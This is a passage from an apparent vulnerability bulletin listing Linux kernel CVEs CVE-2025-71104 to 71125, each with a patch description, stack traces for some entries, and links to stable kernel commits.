programming, the guest may continue to use the software timer in ---truncated--- | 2026-01-14 | not yet calculated | CVE-2025-71104 | https://git.kernel.org/stable/c/786ed625c125c5cd180d6aaa37e653e3e4ffb8d9 https://git.kernel.org/stable/c/d2da0df7bbc4fb4fd7d0a1da704f81a09c72fe73 https://git.kernel.org/stable/c/807dbe8f3862fa7c164155857550ce94b36a11b9 https://git.kernel.org/stable/c/7b54ccef865e0aa62e4871d4ada2ba4b9dcb8bed https://git.kernel.org/stable/c/e746e51947053a02af2ea964593dc4887108d379 https://git.kernel.org/stable/c/e23f46f1a971c73dad2fd63e1408696114ddebe2 https://git.kernel.org/stable/c/18ab3fc8e880791aa9f7c000261320fc812b5465 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: use global inline_xattr_slab instead of per-sb slab cache As Hong Yun reported in mailing list: loop7: detected capacity change from 0 to 131072 ------------[ cut here ]------------ kmem_cache of name 'f2fs_xattr_entry-7:7' already exists WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 kmem_cache_sanity_check mm/slab_common.c:109 [inline] WARNING: CPU: 0 PID: 24426 at mm/slab_common.c:110 __kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307 CPU: 0 UID: 0 PID: 24426 Comm: syz.7.1370 Not tainted 6.17.0-rc4 #1 PREEMPT(full) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014 RIP: 0010:kmem_cache_sanity_check mm/slab_common.c:109 [inline] RIP: 0010:__kmem_cache_create_args+0xa6/0x320 mm/slab_common.c:307 Call Trace: __kmem_cache_create include/linux/slab.h:353 [inline] f2fs_kmem_cache_create fs/f2fs/f2fs.h:2943 [inline] f2fs_init_xattr_caches+0xa5/0xe0 fs/f2fs/xattr.c:843 f2fs_fill_super+0x1645/0x2620 fs/f2fs/super.c:4918 get_tree_bdev_flags+0x1fb/0x260 fs/super.c:1692 vfs_get_tree+0x43/0x140 fs/super.c:1815 do_new_mount+0x201/0x550 fs/namespace.c:3808 do_mount fs/namespace.c:4136 [inline] __do_sys_mount fs/namespace.c:4347 [inline] __se_sys_mount+0x298/0x2f0 fs/namespace.c:4324 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x8e/0x3a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x76/0x7e The bug can be reproduced w/ below scripts: - mount /dev/vdb /mnt1 - mount /dev/vdc /mnt2 - umount /mnt1 - mounnt /dev/vdb /mnt1 The reason is if we created two slab caches, named f2fs_xattr_entry-7:3 and f2fs_xattr_entry-7:7, and they have the same slab size. Actually, slab system will only create one slab cache core structure which has slab name of "f2fs_xattr_entry-7:3", and two slab caches share the same structure and cache address. So, if we destroy f2fs_xattr_entry-7:3 cache w/ cache address, it will decrease reference count of slab cache, rather than release slab cache entirely, since there is one more user has referenced the cache. Then, if we try to create slab cache w/ name "f2fs_xattr_entry-7:3" again, slab system will find that there is existed cache which has the same name and trigger the warning. Let's changes to use global inline_xattr_slab instead of per-sb slab cache for fixing. | 2026-01-14 | not yet calculated | CVE-2025-71105 | https://git.kernel.org/stable/c/93d30fe19660dec6bf1bd3d5c186c1c737b21aa5 https://git.kernel.org/stable/c/474cc3ed37436ddfd63cac8dbffe3b1e219e9100 https://git.kernel.org/stable/c/72ce19dfed162da6e430467333b2da70471d08a4 https://git.kernel.org/stable/c/be4c3a3c6c2304a8fcd14095d18d26f0cc4e222a https://git.kernel.org/stable/c/1eb0b130196bcbc56c5c80c83139fa70c0aa82c5 https://git.kernel.org/stable/c/e6d828eae00ec192e18c2ddaa2fd32050a96048a https://git.kernel.org/stable/c/1f27ef42bb0b7c0740c5616ec577ec188b8a1d05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: PM: Fix reverse check in filesystems_freeze_callback() The freeze_all_ptr check in filesystems_freeze_callback() introduced by commit a3f8f8662771 ("power: always freeze efivarfs") is reverse which quite confusingly causes all file systems to be frozen when filesystem_freeze_enabled is false. On my systems it causes the WARN_ON_ONCE() in __set_task_frozen() to trigger, most likely due to an attempt to freeze a file system that is not ready for that. Add a logical negation to the check in question to reverse it as appropriate. | 2026-01-14 | not yet calculated | CVE-2025-71106 | https://git.kernel.org/stable/c/b107196729ff6b9d6cde0a71f49c1243def43328 https://git.kernel.org/stable/c/222047f68e8565c558728f792f6fef152a1d4d51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: ensure node page reads complete before f2fs_put_super() finishes Xfstests generic/335, generic/336 sometimes crash with the following message: F2FS-fs (dm-0): detect filesystem reference count leak during umount, type: 9, count: 1 ------------[ cut here ]------------ kernel BUG at fs/f2fs/super.c:1939! Oops: invalid opcode: 0000 [#1] SMP NOPTI CPU: 1 UID: 0 PID: 609351 Comm: umount Tainted: G W 6.17.0-rc5-xfstests-g9dd1835ecda5 #1 PREEMPT(none) Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:f2fs_put_super+0x3b3/0x3c0 Call Trace: <TASK> generic_shutdown_super+0x7e/0x190 kill_block_super+0x1a/0x40 kill_f2fs_super+0x9d/0x190 deactivate_locked_super+0x30/0xb0 cleanup_mnt+0xba/0x150 task_work_run+0x5c/0xa0 exit_to_user_mode_loop+0xb7/0xc0 do_syscall_64+0x1ae/0x1c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e </TASK> ---[ end trace 0000000000000000 ]--- It appears that sometimes it is possible that f2fs_put_super() is called before all node page reads are completed. Adding a call to f2fs_wait_on_all_pages() for F2FS_RD_NODE fixes the problem. | 2026-01-14 | not yet calculated | CVE-2025-71107 | https://git.kernel.org/stable/c/c3031cf2b61f1508662fc95ef9ad505cb0882a5f https://git.kernel.org/stable/c/3b15d5f12935e9e25f9a571e680716bc9ee61025 https://git.kernel.org/stable/c/0b36fae23621a09e772c8adf918b9011158f8511 https://git.kernel.org/stable/c/297baa4aa263ff8f5b3d246ee16a660d76aa82c4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: ucsi: Handle incorrect num_connectors capability The UCSI spec states that the num_connectors field is 7 bits, and the 8th bit is reserved and should be set to zero. Some buggy FW has been known to set this bit, and it can lead to a system not booting. Flag that the FW is not behaving correctly, and auto-fix the value so that the system boots correctly. Found on Lenovo P1 G8 during Linux enablement program. The FW will be fixed, but seemed worth addressing in case it hit platforms that aren't officially Linux supported. | 2026-01-14 | not yet calculated | CVE-2025-71108 | https://git.kernel.org/stable/c/07c8d2a109d847775b3b4e2c3294c8e1eea75432 https://git.kernel.org/stable/c/58941bbb0050e365a98c64f1fc4a9a0ac127dba6 https://git.kernel.org/stable/c/f72f97d0aee4a993a35f2496bca5efd24827235d https://git.kernel.org/stable/c/914605b0de8128434eafc9582445306830748b93 https://git.kernel.org/stable/c/3042a57a8e8bce4a3100c3f6f03dc372aab24943 https://git.kernel.org/stable/c/132fe187e0d940f388f839fe2cde9b84106ad20d https://git.kernel.org/stable/c/30cd2cb1abf4c4acdb1ddb468c946f68939819fb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: MIPS: ftrace: Fix memory corruption when kernel is located beyond 32 bits Since commit e424054000878 ("MIPS: Tracing: Reduce the overhead of dynamic Function Tracer"), the macro UASM_i_LA_mostly has been used, and this macro can generate more than 2 instructions. At the same time, the code in ftrace assumes that no more than 2 instructions can be generated, which is why it stores them in an int[2] array. However, as previously noted, the macro UASM_i_LA_mostly (and now UASM_i_LA) causes a buffer overflow when _mcount is beyond 32 bits. This leads to corruption of the variables located in the __read_mostly section. This corruption was observed because the variable __cpu_primary_thread_mask was corrupted, causing a hang very early during boot. This fix prevents the corruption by avoiding the generation of instructions if they could exceed 2 instructions in length. Fortunately, insn_la_mcount is only used if the instrumented code is located outside the kernel code section, so dynamic ftrace can still be used, albeit in a more limited scope. This is still preferable to corrupting memory and/or crashing the kernel. | 2026-01-14 | not yet calculated | CVE-2025-71109 | https://git.kernel.org/stable/c/e3e33ac2eb69d595079a1a1e444c2fb98efdd42d https://git.kernel.org/stable/c/7f39b9d0e86ed6236b9a5fb67616ab1f76c4f150 https://git.kernel.org/stable/c/36dac9a3dda1f2bae343191bc16b910c603cac25 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/slub: reset KASAN tag in defer_free() before accessing freed memory When CONFIG_SLUB_TINY is enabled, kfree_nolock() calls kasan_slab_free() before defer_free(). On ARM64 with MTE (Memory Tagging Extension), kasan_slab_free() poisons the memory and changes the tag from the original (e.g., 0xf3) to a poison tag (0xfe). When defer_free() then tries to write to the freed object to build the deferred free list via llist_add(), the pointer still has the old tag, causing a tag mismatch and triggering a KASAN use-after-free report: BUG: KASAN: slab-use-after-free in defer_free+0x3c/0xbc mm/slub.c:6537 Write at addr f3f000000854f020 by task kworker/u8:6/983 Pointer tag: [f3], memory tag: [fe] Fix this by calling kasan_reset_tag() before accessing the freed memory. This is safe because defer_free() is part of the allocator itself and is expected to manipulate freed memory for bookkeeping purposes. | 2026-01-14 | not yet calculated | CVE-2025-71110 | https://git.kernel.org/stable/c/65d4e5af2a2e82f4fc50d8259aee208fbc6b2c1d https://git.kernel.org/stable/c/53ca00a19d345197a37a1bf552e8d1e7b091666c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hwmon: (w83791d) Convert macros to functions to avoid TOCTOU The macro FAN_FROM_REG evaluates its arguments multiple times. When used in lockless contexts involving shared driver data, this leads to Time-of-Check to Time-of-Use (TOCTOU) race conditions, potentially causing divide-by-zero errors. Convert the macro to a static function. This guarantees that arguments are evaluated only once (pass-by-value), preventing the race conditions. Additionally, in store_fan_div, move the calculation of the minimum limit inside the update lock. This ensures that the read-modify-write sequence operates on consistent data. Adhere to the principle of minimal changes by only converting macros that evaluate arguments multiple times and are used in lockless contexts. | 2026-01-14 | not yet calculated | CVE-2025-71111 | https://git.kernel.org/stable/c/3dceb68f6ad33156032ef4da21a93d84059cca6d https://git.kernel.org/stable/c/bf5b03227f2e6d4360004886d268f9df8993ef8f https://git.kernel.org/stable/c/f2b579a0c37c0df19603d719894a942a295f634a https://git.kernel.org/stable/c/f94800fbc26ccf7c81eb791707b038a57aa39a18 https://git.kernel.org/stable/c/a9fb6e8835a22f5796c1182ed612daed3fd273af https://git.kernel.org/stable/c/c8cf0c2bdcccc6634b6915ff793b844e12436680 https://git.kernel.org/stable/c/670d7ef945d3a84683594429aea6ab2cdfa5ceb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: add VLAN id validation before using Currently, the VLAN id may be used without validation when receive a VLAN configuration mailbox from VF. The length of vlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause out-of-bounds memory access once the VLAN id is bigger than or equal to VLAN_N_VID. Therefore, VLAN id needs to be checked to ensure it is within the range of VLAN_N_VID. | 2026-01-14 | not yet calculated | CVE-2025-71112 | https://git.kernel.org/stable/c/46c7d9fe8dd869ea5de666aba8c1ec1061ca44a8 https://git.kernel.org/stable/c/42c91dfa772c57de141e5a55a187ac760c0fd7e1 https://git.kernel.org/stable/c/00e56a7706e10b3d00a258d81fcb85a7e96372d6 https://git.kernel.org/stable/c/b7b4f3bf118f51b67691a55b464f04452e5dc6fc https://git.kernel.org/stable/c/95cca255a7a5ad782639ff0298c2a486707d1046 https://git.kernel.org/stable/c/91a51d01be5c9f82c12c2921ca5cceaa31b67128 https://git.kernel.org/stable/c/6ef935e65902bfed53980ad2754b06a284ea8ac1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - zero initialize memory allocated via sock_kmalloc Several crypto user API contexts and requests allocated with sock_kmalloc() were left uninitialized, relying on callers to set fields explicitly. This resulted in the use of uninitialized data in certain error paths or when new fields are added in the future. The ACVP patches also contain two user-space interface files: algif_kpp.c and algif_akcipher.c. These too rely on proper initialization of their context structures. A particular issue has been observed with the newly added 'inflight' variable introduced in af_alg_ctx by commit: 67b164a871af ("crypto: af_alg - Disallow multiple in-flight AIO requests") Because the context is not memset to zero after allocation, the inflight variable has contained garbage values. As a result, af_alg_alloc_areq() has incorrectly returned -EBUSY randomly when the garbage value was interpreted as true: https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209 The check directly tests ctx->inflight without explicitly comparing against true/false. Since inflight is only ever set to true or false later, an uninitialized value has triggered -EBUSY failures. Zero-initializing memory allocated with sock_kmalloc() ensures inflight and other fields start in a known state, removing random issues caused by uninitialized data. | 2026-01-14 | not yet calculated | CVE-2025-71113 | https://git.kernel.org/stable/c/e125c8e346e4eb7b3e854c862fcb4392bc13ddba https://git.kernel.org/stable/c/543bf004e4eafbb302b1e6c78570d425d2ca13a0 https://git.kernel.org/stable/c/f81244fd6b14fecfa93b66b6bb1d59f96554e550 https://git.kernel.org/stable/c/84238876e3b3b262cf62d5f4d1338e983fb27010 https://git.kernel.org/stable/c/5a4b65523608974a81edbe386f8a667a3e10c726 https://git.kernel.org/stable/c/51a5ab36084f3251ef87eda3e6a6236f6488925e https://git.kernel.org/stable/c/6f6e309328d53a10c0fe1f77dec2db73373179b6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: via_wdt: fix critical boot hang due to unnamed resource allocation The VIA watchdog driver uses allocate_resource() to reserve a MMIO region for the watchdog control register. However, the allocated resource was not given a name, which causes the kernel resource tree to contain an entry marked as "<BAD>" under /proc/iomem on x86 platforms. During boot, this unnamed resource can lead to a critical hang because subsequent resource lookups and conflict checks fail to handle the invalid entry properly. | 2026-01-14 | not yet calculated | CVE-2025-71114 | https://git.kernel.org/stable/c/1d56025a3af50db0f3da2792f41eb9943eee5324 https://git.kernel.org/stable/c/c7b986adc9e9336066350542ac5a2005d305ae78 https://git.kernel.org/stable/c/47c910965c936724070d2a8094a4c3ed8f452856 https://git.kernel.org/stable/c/d2c7c90aca7b37f60f16b2bedcfeb16204f2f35d https://git.kernel.org/stable/c/f7b6370d0fbee06a867037d675797a606cb62e57 https://git.kernel.org/stable/c/c6a2dd4f2e4e6cbdfe7a1618160281af897b75db https://git.kernel.org/stable/c/7aa31ee9ec92915926e74731378c009c9cc04928 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: um: init cpu_tasks[] earlier This is currently done in uml_finishsetup(), but e.g. with KCOV enabled we'll crash because some init code can call into e.g. memparse(), which has coverage annotations, and then the checks in check_kcov_mode() crash because current is NULL. Simply initialize the cpu_tasks[] array statically, which fixes the crash. For the later SMP work, it seems to have not really caused any problems yet, but initialize all of the entries anyway. | 2026-01-14 | not yet calculated | CVE-2025-71115 | https://git.kernel.org/stable/c/dbbf6d47130674640cd12a0781a0fb2a575d0e44 https://git.kernel.org/stable/c/7b5d4416964c07c902163822a30a622111172b01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: libceph: make decode_pool() more resilient against corrupted osdmaps If the osdmap is (maliciously) corrupted such that the encoded length of ceph_pg_pool envelope is less than what is expected for a particular encoding version, out-of-bounds reads may ensue because the only bounds check that is there is based on that length value. This patch adds explicit bounds checks for each field that is decoded or skipped. | 2026-01-14 | not yet calculated | CVE-2025-71116 | https://git.kernel.org/stable/c/d061be4c8040ffb1110d537654a038b8b6ad39d2 https://git.kernel.org/stable/c/145d140abda80e33331c5781d6603014fa75d258 https://git.kernel.org/stable/c/c82e39ff67353a5a6cbc07b786b8690bd2c45aaa https://git.kernel.org/stable/c/e927ab132b87ba3f076705fc2684d94b24201ed1 https://git.kernel.org/stable/c/5d0d8c292531fe356c4e94dcfdf7d7212aca9957 https://git.kernel.org/stable/c/2acb8517429ab42146c6c0ac1daed1f03d2fd125 https://git.kernel.org/stable/c/8c738512714e8c0aa18f8a10c072d5b01c83db39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: Remove queue freezing from several sysfs store callbacks Freezing the request queue from inside sysfs store callbacks may cause a deadlock in combination with the dm-multipath driver and the queue_if_no_path option. Additionally, freezing the request queue slows down system boot on systems where sysfs attributes are set synchronously. Fix this by removing the blk_mq_freeze_queue() / blk_mq_unfreeze_queue() calls from the store callbacks that do not strictly need these callbacks. Add the __data_racy annotation to request_queue.rq_timeout to suppress KCSAN data race reports about the rq_timeout reads. This patch may cause a small delay in applying the new settings. For all the attributes affected by this patch, I/O will complete correctly whether the old or the new value of the attribute is used. This patch affects the following sysfs attributes: * io_poll_delay * io_timeout * nomerges * read_ahead_kb * rq_affinity Here is an example of a deadlock triggered by running test srp/002 if this patch is not applied: task:multipathd Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 schedule_preempt_disabled+0x1c/0x30 __mutex_lock+0xb89/0x1650 mutex_lock_nested+0x1f/0x30 dm_table_set_restrictions+0x823/0xdf0 __bind+0x166/0x590 dm_swap_table+0x2a7/0x490 do_resume+0x1b1/0x610 dev_suspend+0x55/0x1a0 ctl_ioctl+0x3a5/0x7e0 dm_ctl_ioctl+0x12/0x20 __x64_sys_ioctl+0x127/0x1a0 x64_sys_call+0xe2b/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> task:(udev-worker) Call Trace: <TASK> __schedule+0x8c1/0x1bf0 schedule+0xdd/0x270 blk_mq_freeze_queue_wait+0xf2/0x140 blk_mq_freeze_queue_nomemsave+0x23/0x30 queue_ra_store+0x14e/0x290 queue_attr_store+0x23e/0x2c0 sysfs_kf_write+0xde/0x140 kernfs_fop_write_iter+0x3b2/0x630 vfs_write+0x4fd/0x1390 ksys_write+0xfd/0x230 __x64_sys_write+0x76/0xc0 x64_sys_call+0x276/0x17d0 do_syscall_64+0x96/0x3a0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 </TASK> | 2026-01-14 | not yet calculated | CVE-2025-71117 | https://git.kernel.org/stable/c/3997b3147c7b68b0308378fa95a766015f8ceb1c https://git.kernel.org/stable/c/935a20d1bebf6236076785fac3ff81e3931834e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPICA: Avoid walking the Namespace if start_node is NULL Although commit 0c9992315e73 ("ACPICA: Avoid walking the ACPI Namespace if it is not there") fixed the situation when both start_node and acpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed on Honor Magicbook 14 Pro [1]. That happens due to the access to the member of parent_node in acpi_ns_get_next_node(). The NULL pointer dereference will always happen, no matter whether or not the start_node is equal to ACPI_ROOT_OBJECT, so move the check of start_node being NULL out of the if block. Unfortunately, all the attempts to contact Honor have failed, they refused to provide any technical support for Linux. The bad DSDT table's dump could be found on GitHub [2]. DMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025 [ rjw: Subject adjustment, changelog edits ] | 2026-01-14 | not yet calculated | CVE-2025-71118 | https://git.kernel.org/stable/c/b84edef48cc8afb41150949a87dcfa81bc95b53e https://git.kernel.org/stable/c/ecb296286c8787895625bd4c53e9478db4ae139c https://git.kernel.org/stable/c/7f9b951ed11842373851dd3c91860778356d62d3 https://git.kernel.org/stable/c/1bc34293dfbd266c29875206849b4f8e8177e6df https://git.kernel.org/stable/c/0d8bb08126920fd4b12dbf32d9250757c9064b36 https://git.kernel.org/stable/c/f91dad0a3b381244183ffbea4cec5a7a69d6f41e https://git.kernel.org/stable/c/9d6c58dae8f6590c746ac5d0012ffe14a77539f0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/kexec: Enable SMT before waking offline CPUs If SMT is disabled or a partial SMT state is enabled, when a new kernel image is loaded for kexec, on reboot the following warning is observed: kexec: Waking offline cpu 228. WARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc [snip] NIP kexec_prepare_cpus+0x1b0/0x1bc LR kexec_prepare_cpus+0x1a0/0x1bc Call Trace: kexec_prepare_cpus+0x1a0/0x1bc (unreliable) default_machine_kexec+0x160/0x19c machine_kexec+0x80/0x88 kernel_kexec+0xd0/0x118 __do_sys_reboot+0x210/0x2c4 system_call_exception+0x124/0x320 system_call_vectored_common+0x15c/0x2ec This occurs as add_cpu() fails due to cpu_bootable() returning false for CPUs that fail the cpu_smt_thread_allowed() check or non primary threads if SMT is disabled. Fix the issue by enabling SMT and resetting the number of SMT threads to the number of threads per core, before attempting to wake up all present CPUs. | 2026-01-14 | not yet calculated | CVE-2025-71119 | https://git.kernel.org/stable/c/7cccd82a0e4aad192fd74fc60e61ed9aed5857a3 https://git.kernel.org/stable/c/d790ef0c4819424ee0c2f448c0a8154c5ca369d1 https://git.kernel.org/stable/c/f0c0a681ffb77b8c5290c88c02d968199663939b https://git.kernel.org/stable/c/0d5c9e901ad40bd39b38e119c0454b52d7663930 https://git.kernel.org/stable/c/c2296a1e42418556efbeb5636c4fa6aa6106713a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf A zero length gss_token results in pages == 0 and in_token->pages[0] is NULL. The code unconditionally evaluates page_address(in_token->pages[0]) for the initial memcpy, which can dereference NULL even when the copy length is 0. Guard the first memcpy so it only runs when length > 0. | 2026-01-14 | not yet calculated | CVE-2025-71120 | https://git.kernel.org/stable/c/a8f1e445ce3545c90d69c9e8ff8f7821825fe810 https://git.kernel.org/stable/c/4dedb6a11243a5c9eb9dbb97bca3c98bd725e83d https://git.kernel.org/stable/c/f9e53f69ac3bc4ef568b08d3542edac02e83fefd https://git.kernel.org/stable/c/7452d53f293379e2c38cfa8ad0694aa46fc4788b https://git.kernel.org/stable/c/a2c6f25ab98b423f99ccd94874d655b8bcb01a19 https://git.kernel.org/stable/c/1c8bb965e9b0559ff0f5690615a527c30f651dd8 https://git.kernel.org/stable/c/d4b69a6186b215d2dc1ebcab965ed88e8d41768d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: parisc: Do not reprogram affinitiy on ASP chip The ASP chip is a very old variant of the GSP chip and is used e.g. in HP 730 workstations. When trying to reprogram the affinity it will crash with a HPMC as the relevant registers don't seem to be at the usual location. Let's avoid the crash by checking the sversion. Also note, that reprogramming isn't necessary either, as the HP730 is a just a single-CPU machine. | 2026-01-14 | not yet calculated | CVE-2025-71121 | https://git.kernel.org/stable/c/845a92b74cf7a730200532ecb4482981cec9d006 https://git.kernel.org/stable/c/7a146f34e5be96330467397c9fd9d3d851b2cbbe https://git.kernel.org/stable/c/4d0858bbeea12a50bfb32137f74d4b74917ebadd https://git.kernel.org/stable/c/e09fd2eb6d4c993ee9eaae556cb51e30ec1042df https://git.kernel.org/stable/c/60560d13ff368415c96a0c1247bea16d427c0641 https://git.kernel.org/stable/c/c8f810e20f4bbe50b49f73429d9fa6efad00623e https://git.kernel.org/stable/c/dca7da244349eef4d78527cafc0bf80816b261f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd/selftest: Check for overflow in IOMMU_TEST_OP_ADD_RESERVED syzkaller found it could overflow math in the test infrastructure and cause a WARN_ON by corrupting the reserved interval tree. This only effects test kernels with CONFIG_IOMMUFD_TEST. Validate the user input length in the test ioctl. | 2026-01-14 | not yet calculated | CVE-2025-71122 | https://git.kernel.org/stable/c/4cc829d61f10c20523fd4085c1546e741a792a97 https://git.kernel.org/stable/c/e6c122cffcbb2e84d321ec8ba0e38ce8e7c10925 https://git.kernel.org/stable/c/b166b8e0a381429fefd9180e67fbc834b3cee82f https://git.kernel.org/stable/c/e6a973af11135439de32ece3b9cbe3bfc043bea8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix string copying in parse_apply_sb_mount_options() strscpy_pad() can't be used to copy a non-NUL-term string into a NUL-term string of possibly bigger size. Commit 0efc5990bca5 ("string.h: Introduce memtostr() and memtostr_pad()") provides additional information in that regard. So if this happens, the following warning is observed: strnlen: detected buffer overflow: 65 byte read of buffer size 64 WARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Modules linked in: CPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 RIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032 Call Trace: <TASK> __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039 strnlen include/linux/fortify-string.h:235 [inline] sized_strscpy include/linux/fortify-string.h:309 [inline] parse_apply_sb_mount_options fs/ext4/super.c:2504 [inline] __ext4_fill_super fs/ext4/super.c:5261 [inline] ext4_fill_super+0x3c35/0xad00 fs/ext4/super.c:5706 get_tree_bdev_flags+0x387/0x620 fs/super.c:1636 vfs_get_tree+0x93/0x380 fs/super.c:1814 do_new_mount fs/namespace.c:3553 [inline] path_mount+0x6ae/0x1f70 fs/namespace.c:3880 do_mount fs/namespace.c:3893 [inline] __do_sys_mount fs/namespace.c:4103 [inline] __se_sys_mount fs/namespace.c:4080 [inline] __x64_sys_mount+0x280/0x300 fs/namespace.c:4080 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x64/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x76/0x7e Since userspace is expected to provide s_mount_opts field to be at most 63 characters long with the ending byte being NUL-term, use a 64-byte buffer which matches the size of s_mount_opts, so that strscpy_pad() does its job properly. Return with error if the user still managed to provide a non-NUL-term string here. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-01-14 | not yet calculated | CVE-2025-71123 | https://git.kernel.org/stable/c/52ac96c4a2dd7bc47666000440b0602d9742e820 https://git.kernel.org/stable/c/6e37143560e37869d51b7d9e0ac61fc48895f8a0 https://git.kernel.org/stable/c/902ca2356f1e3ec5355c5808ad5d3f9d0095b0cc https://git.kernel.org/stable/c/db9ee13fab0267eccf6544ee35b16c9522db9aac https://git.kernel.org/stable/c/5bbacbbf1ca4419861dca3c6b82707c10e9c021c https://git.kernel.org/stable/c/ee5a977b4e771cc181f39d504426dbd31ed701cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/a6xx: move preempt_prepare_postamble after error check Move the call to preempt_prepare_postamble() after verifying that preempt_postamble_ptr is valid. If preempt_postamble_ptr is NULL, dereferencing it in preempt_prepare_postamble() would lead to a crash. This change avoids calling the preparation function when the postamble allocation has failed, preventing potential NULL pointer dereference and ensuring proper error handling. Patchwork: https://patchwork.freedesktop.org/patch/687659/ | 2026-01-14 | not yet calculated | CVE-2025-71124 | https://git.kernel.org/stable/c/2c46497eb148ec61909f4101b8443f3c4c2daaec https://git.kernel.org/stable/c/ef3b04091fd8bc737dc45312375df8625b8318e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tracing: Do not register unsupported perf events Synthetic events currently do not have a function to register perf events. This leads to calling the tracepoint register functions with a NULL function pointer which triggers: ------------[ cut here ]------------ WARNING: kernel/tracepoint.c:175 at tracepoint_add_func+0x357/0x370, CPU#2: perf/2272 Modules linked in: kvm_intel kvm irqbypass CPU: 2 UID: 0 PID: 2272 Comm: perf Not tainted 6.18.0-ftest-11964-ge022764176fc-dirty #323 PREEMPTLAZY Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:tracepoint_add_func+0x357/0x370 Code: 28 9c e8 4c 0b f5 ff eb 0f 4c 89 f7 48 c7 c6 80 4d 28 9c e8 ab 89 f4 ff 31 c0 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc <0f> 0b 49 c7 c6 ea ff ff ff e9 ee fe ff ff 0f 0b e9 f9 fe ff ff 0f RSP: 0018:ffffabc0c44d3c40 EFLAGS: 00010246 RAX: 0000000000000001 RBX: ffff9380aa9e4060 RCX: 0000000000000000 RDX: 000000000000000a RSI: ffffffff9e1d4a98 RDI: ffff937fcf5fd6c8 RBP: 0000000000000001 R08: 0000000000000007 R09: ffff937fcf5fc780 R10: 0000000000000003 R11: ffffffff9c193910 R12: 000000000000000a R13: ffffffff9e1e5888 R14: 0000000000000000 R15: ffffabc0c44d3c78 FS: 00007f6202f5f340(0000) GS:ffff93819f00f000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000055d3162281a8 CR3: 0000000106a56003 CR4: 0000000000172ef0 Call Trace: <TASK> tracepoint_probe_register+0x5d/0x90 synth_event_reg+0x3c/0x60 perf_trace_event_init+0x204/0x340 perf_trace_init+0x85/0xd0 perf_tp_event_init+0x2e/0x50 perf_try_init_event+0x6f/0x230 ? perf_event_alloc+0x4bb/0xdc0 perf_event_alloc+0x65a/0xdc0 __se_sys_perf_event_open+0x290/0x9f0 do_syscall_64+0x93/0x7b0 ? entry_SYSCALL_64_after_hwframe+0x76/0x7e ? trace_hardirqs_off+0x53/0xc0 entry_SYSCALL_64_after_hwframe+0x76/0x7e Instead, have the code return -ENODEV, which doesn't warn and has perf error out with: # perf record -e synthetic:futex_wait Error: The sys_perf_event_open() syscall returned with 19 (No such device) for event (synthetic:futex_wait). "dmesg | grep -i perf" may provide additional information. Ideally perf should support synthetic events, but for now just fix the warning. The support can come later. | 2026-01-14 | not yet calculated | CVE-2025-71125 | https://git.kernel.org/stable/c/6819bc6285c0ff835f67cfae7efebc03541782f6 https://git.kernel.org/stable/c/6d15f08e6d8d4b4fb02d90805ea97f3e2c1d6fbc https://git.kernel.org/stable/c/f7305697b60d79bc69c0a6e280fc931b4e8862dd 